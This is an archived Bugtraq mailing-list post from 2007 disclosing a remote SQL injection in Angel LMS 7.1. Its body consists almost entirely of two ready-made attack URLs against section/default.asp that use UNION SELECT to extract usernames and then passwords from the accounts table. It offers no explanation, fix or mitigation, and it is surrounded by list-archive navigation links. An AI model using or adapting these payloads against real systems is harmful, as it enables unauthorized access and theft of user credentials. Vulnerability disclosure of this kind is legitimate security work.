[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Angel LMS 7.1 - Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Angel LMS 7.1 - Remote SQL Injection
From: Guns@xxxxxxxxx
Date: 1 Mar 2007 16:06:06 -0000

# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"

#Account Passwords#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"

Follow-Ups:
- Re: Angel LMS 7.1 - Remote SQL Injection
  - From: str0ke

Prev by Date: Comodo Bypassing settings protection using magic pipe Vulnerability
Next by Date: Serendipity unauthenticated SQL-Injection
Previous by thread: Comodo Bypassing settings protection using magic pipe Vulnerability
Next by thread: Re: Angel LMS 7.1 - Remote SQL Injection
Index(es):
- Date
- Thread